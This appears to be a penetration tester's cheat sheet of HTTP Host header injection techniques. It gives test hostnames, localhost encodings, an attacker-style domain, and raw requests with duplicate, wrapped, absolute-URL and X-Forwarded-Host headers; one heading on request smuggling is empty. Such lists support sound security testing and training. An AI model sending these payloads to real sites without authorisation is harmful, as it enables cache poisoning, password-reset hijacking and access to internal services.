1- Check for flawed validation:

vulnerable-website.com:bad-stuff-here
notvulnerable-website.com
hacked-subdomain.vulnerable-website.com
-------------------------------------------------------------------------------------
localhost: 127.0.0.1, 127.1, 2130706433, 017700000001
http: to https:
-------------------------------------------------------------------------------------
normal-website.com
hackersnormal-website.com
normal-website.com.evil-user.net

======================================================================================
2- Inject duplicate Host headers:

GET /example HTTP/1.1
Host: vulnerable-website.com
Host: bad-stuff-here

======================================================================================
3- Supply an absolute URL:

GET https://vulnerable-website.com/ HTTP/1.1
Host: bad-stuff-here
======================================================================================
4- Add line wrapping:
 

GET /example HTTP/1.1
    Host: bad-stuff-here
Host: vulnerable-website.com
======================================================================================
5- HTTP request smuggling techniques:

======================================================================================
6- Inject host override headers:

GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: bad-stuff-here
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
======================================================================================